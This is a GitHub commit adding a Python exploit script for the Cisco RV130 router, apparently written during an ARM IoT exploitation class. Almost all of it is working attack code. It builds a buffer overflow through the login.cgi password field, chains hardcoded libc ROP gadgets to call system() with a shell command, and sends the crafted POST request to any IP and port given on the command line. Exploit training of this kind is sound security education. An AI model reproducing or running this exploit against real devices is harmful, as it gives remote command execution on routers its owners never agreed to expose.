STRLCPY/3sjay-sploits

Create cisco_rv130_expl.py

Exploit written during the ARM IoT Exploitation class of @Realsaumil

3sjay committed with GitHub 2 years ago

1e9640ba

1 parent b38df082

Total 1 files

■ ■ ■ ■ ■ ■

cisco_rv130_expl.py

1	+	#!/usr/bin/python
2	+	#
3	+	# The ARM IoT Exploit Laboratory
4	+	# by Saumil Shah
5	+	#
6	+	# Exploit template for Cisco RV130 router
7	+
8	+	import struct, sys, re, socket
9	+
10	+
11	+	##### HELPER FUNCTIONS #####
12	+
13	+	def pack32(value):
14	+	return struct.pack("<I", value) # little byte order
15	+
16	+	def pack16n(value):
17	+	return struct.pack(">H", value) # big/network byte order
18	+
19	+	def urlencode(buf):
20	+	s = ""
21	+	for b in buf:
22	+	if re.match(r"[a-zA-Z0-9\/]", b) is None:
23	+	s += "%%%02X" % ord(b)
24	+	else:
25	+	s += b
26	+	return s
27	+
28	+	##### HELPER FUNCTIONS FOR ROP CHAINING #####
29	+
30	+	# function to create a libc gadget
31	+	# requires a global variable called libc_base
32	+	def libc(offset):
33	+	return pack32(libc_base + offset)
34	+
35	+	# function to represent data on the stack
36	+	def data(data):
37	+	return pack32(data)
38	+
39	+	# function to check for bad characters
40	+	# run this before sending out the payload
41	+	# e.g. detect_badchars(payload, "\x00\x0a\x0d/?")
42	+	def detect_badchars(string, badchars):
43	+	for badchar in badchars:
44	+	i = string.find(badchar)
45	+	while i != -1:
46	+	sys.stderr.write("[!] 0x%02x appears at position %d\n" % (ord(badchar), i))
47	+	i = string.find(badchar, i+1)
48	+
49	+	##### MAIN #####
50	+	if len(sys.argv) != 3:
51	+	print("Usage: expl.py <ip> <port>")
52	+	sys.exit(1)
53	+
54	+	ip = sys.argv[1]
55	+	port = sys.argv[2]
56	+
57	+	# $1 = {<text variable, no debug info>} 0x35849144 <system>
58	+	system = pack32(0x35849144)
59	+
60	+	# 0x357fc000 0x35859000 0x00000000 r-x /emux/RV130/rootfs/lib/libc.so.0
61	+	libc_base = 0x357fc000
62	+
63	+	"""
64	+	ROP Gadget Flow:
65	+	1. Gadget
66	+
67	+	# r5 -> system
68	+	# r6 -> next gadget
69	+	0x00024278: mov r2, r5; blx r6;
70	+
71	+
72	+	2. Gadget
73	+	# sp -> points to our command
74	+	# r2 is set with the previous gadget to point to system
75	+	0x00041308: mov r0, sp; blx r2;
76	+	"""
77	+
78	+
79	+	"""
80	+	0x00041308: mov r0, sp; blx r2;
81	+	"""
82	+	mov_r0_sp_blx_r2 = pack32(libc_base + 0x00041308)
83	+
84	+	pattern = "AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMM"
85	+	pattern += system
86	+	pattern += mov_r0_sp_blx_r2
87	+	pattern += "PPPPQQQQRRRRSSSSTTTT"
88	+
89	+
90	+	buf = "A" * (446-len(pattern))
91	+	buf += pattern
92	+
93	+	rop = ''
94	+
95	+	"""
96	+	0x358494e8 <+36>: ldr r0, [sp, #4]
97	+	0x358494ec <+40>: add sp, sp, #12
98	+	0x358494f0 <+44>: ldmfd sp!, {pc}
99	+	"""
100	+	ldr_r0 = pack32(0x358494e8)
101	+
102	+
103	+	# 0x00052620: pop {r2, r3}; bx lr;
104	+	pop_r2_r3_bx_lr = pack32(libc_base + 0x00052620)
105	+
106	+	# THUMB: 0x00020e78 (0x00020e79): pop {r2, r6, pc};
107	+	# doesn't seem to work using THUMB gadgets :(
108	+	#pop_r2_r6_pc = pack32(libc_base + 0x00020e78)
109	+
110	+	#rop += ldr_r0
111	+	#rop += pop_r2_r6_pc
112	+
113	+	"""
114	+	# r5 -> system
115	+	# r6 -> next gadget
116	+	0x00024278: mov r2, r5; blx r6;
117	+	"""
118	+	rop += pack32(libc_base + 0x00024278)
119	+
120	+	rop += 'touch /tmp/esjaywashere;#'
121	+
122	+	# Not relevant
123	+	rop += data(0x48484848)
124	+	rop += data(0x49494949)
125	+	rop += data(0x50505050)
126	+
127	+	buf = buf + rop
128	+	buf += "F"*100
129	+
130	+	detect_badchars(buf, "\x00")
131	+
132	+	pwd = urlencode(buf)
133	+	data = "submit_button=login&submit_type=&gui_action=&default_login=1&wait_time=0&change_action=&enc=1&user=cisco&pwd=%s&sel_lang=EN" % pwd
134	+	uri = "/login.cgi"
135	+
136	+	request = "POST %s HTTP/1.0\n" % uri
137	+	request += "Host: 127.0.0.1\n"
138	+	request += "Content-Length: %s\n" % len(data)
139	+	request += "Content-Type: application/x-www-form-urlencoded\n\n"
140	+	request += "%s\n" % data
141	+
142	+
143	+	#print request,
144	+	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
145	+	s.connect((ip, int(port)))
146	+	s.send(request)
147	+